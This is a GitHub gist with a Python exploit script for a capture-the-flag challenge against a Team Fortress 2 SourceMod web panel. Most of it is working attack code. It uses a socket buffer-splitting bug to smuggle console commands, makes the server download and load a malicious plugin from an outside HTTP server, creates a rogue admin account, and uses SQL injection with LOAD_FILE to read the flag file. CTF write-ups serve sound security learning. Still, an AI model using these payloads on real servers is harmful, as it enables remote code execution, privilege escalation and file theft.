Last active
January 31, 2021 19:23
-
-
Save patryk4815/212d6605f84d69208c530508497256b7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
###################################### | |
#### Leaked old video how plugin works | |
#### https://youtu.be/r_nzF7LJpNM | |
###################################### | |
task_addr = 'http://painterhell.web.jctf.pro:1337' | |
def cmd(cmd): | |
# BUG: If you send more then 16330 bytes. | |
# OnChildSocketReceive will split "receiveData" into two packets... | |
# Bug is in socket.so here: https://github.com/nefarius/sm-ext-socket/blob/ed6bf7a12bd3f801610592301e12062b367fa27b/Socket.cpp#L233 | |
# It has 16384 bytes buffor for one function call. | |
sid = b'/.' * 8165 + b'//cmd:' + cmd | |
t = requests.get(task_addr + '/tf/colors/', params={ | |
'port': '52570', | |
'ip': '127.0.0.1', | |
'sid': sid, | |
}) | |
print(t.status_code) | |
print(t.content[:100]) | |
t = requests.post(task_addr + '/tf/colors/', params={ | |
'sid': sid, | |
}, data={ | |
'nazwa': 't', | |
'rgb1': '00', | |
'rgb2': '00', | |
}) | |
print(t.status_code) | |
print(t.content[:100]) | |
response = t.content.split(b'<div class="info"')[1].split(b'</div>')[0] | |
print(response) | |
if b'Bad data!' in response: | |
return True | |
return False | |
def sqlinjection(steamid, injection): | |
# BUG: If you send more then 16330 bytes. | |
# OnChildSocketReceive will split "receiveData" into two packets... | |
# Bug is in socket.so here: https://github.com/nefarius/sm-ext-socket/blob/ed6bf7a12bd3f801610592301e12062b367fa27b/Socket.cpp#L233 | |
# It has 16384 bytes buffor for one function call. | |
# SqlInjection bug in "name" | |
sid = b'/.' * 8165 + ('//kolory:{};{};0;0'.format(steamid, injection)).encode() | |
t = requests.get(task_addr + '/tf/colors/', params={ | |
'port': '52570', | |
'ip': '127.0.0.1', | |
'sid': sid, | |
}) | |
print(t.status_code) | |
print(t.content[:100]) | |
t = requests.post(task_addr + '/tf/colors/', params={ | |
'sid': sid, | |
}, data={ | |
'nazwa': 't', | |
'rgb1': '00', | |
'rgb2': '00', | |
}) | |
print(t.status_code) | |
print(t.content[:100]) | |
response = t.content.split(b'<div class="info"')[1].split(b'</div>')[0] | |
print(response) | |
if b'Bad data!' in response: | |
return True | |
return False | |
def solve_rce_way(): | |
# 1. write custom http server | |
# it should return compiled "leakflag.smx", example source code for reading flag: | |
''' | |
#include <sourcemod> | |
#define PLUGIN_VERSION "0.0.1" | |
#define PLUGIN_NAME "LeakFlag" | |
public Plugin:myinfo = | |
{ | |
name = PLUGIN_NAME, | |
author = "Cypis", | |
description = "", | |
version = PLUGIN_VERSION, | |
url = "http://steamcommunity.com/id/cypiss/" | |
} | |
public OnPluginStart() | |
{ | |
RegConsoleCmd("sm_flag", CmdFlag); | |
} | |
public Action:CmdFlag(client, args) | |
{ | |
if(!IsClientInGame(client)) | |
return Plugin_Continue; | |
new Handle:open = OpenFile("../../../../../../../../../../../../../../../../../../flag.txt", "rt"); | |
decl String:szText[128]; | |
while(!IsEndOfFile(open)) | |
{ | |
ReadFileLine(open, szText, sizeof(szText)); | |
PrintToChatAll("ReadFile: %s", szText); | |
} | |
CloseHandle(open); | |
return Plugin_Continue; | |
} | |
''' | |
# 2. efekty_new.smx now should connect to our http server and download files "hats_info_pl.txt", etc. | |
cmd(b';'.join([ | |
b'sm_efekty_status 908337898', # plugin should connect to http://908337898/ (ip to long) | |
b'sm plugins reload 1', # reload plugin | |
b'sm_items_update', # download files from http://908337898/ | |
])) | |
time.sleep(5) | |
# 2. load our exploit for reading flag.txt and printing | |
cmd(b'sm plugins load ..\\data\\hats_info_pl.txt') | |
# 3. [HUMAN JOB] connect to TF2 server and write "!flag" | |
# Screen: https://media.discordapp.net/attachments/656261024554549253/805512618428071946/Zrzut_ekranu_2021-01-31_o_19.58.57.png?width=788&height=1067 | |
pass | |
def solve_sqlinjection_way(): | |
# 1. [HUMAN JOB] connect to the server | |
pass | |
# 2. create admin to my steam account | |
cmd(b';'.join([ | |
b'sm plugins load disabled\\sql-admin-manager.smx', | |
b'sm plugins load disabled\\admin-sql-prefetch.smx', | |
b'sm plugins load disabled\\basecommands.smx', | |
b'sm_create_adm_tables', | |
b'sm_sql_addadmin cypis steam "STEAM_0:0:30683735" p 99', | |
b'sm_reloadadmins', | |
])) | |
# 3. load flag into PlayerColors table. | |
# BTW: tf2 client can only show 20 characters in "menu" | |
sqlinjection('STEAM_0:0:30683735', "x',LOAD_FILE(0x2f666c61672e747874),0)#") | |
sqlinjection('STEAM_0:0:30683735', "x','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#") | |
sqlinjection('STEAM_0:0:30683735', "y',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),20),0)#") | |
sqlinjection('STEAM_0:0:30683735', "y','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#") | |
sqlinjection('STEAM_0:0:30683735', "z',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),40),0)#") | |
sqlinjection('STEAM_0:0:30683735', "z','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#") | |
sqlinjection('STEAM_0:0:30683735', "j',SUBSTRING(LOAD_FILE(0x2f666c61672e747874),60),0)#") | |
sqlinjection('STEAM_0:0:30683735', "j','',0) ON DUPLICATE KEY UPDATE NAME = COLOR#") | |
# 4. [HUMAN JOB] now write on chat "!colors" and go to "!usun" tab and you will see flag! | |
# Screen: https://media.discordapp.net/attachments/656261024554549253/805512618773184582/Zrzut_ekranu_2021-01-31_o_19.59.09.png | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment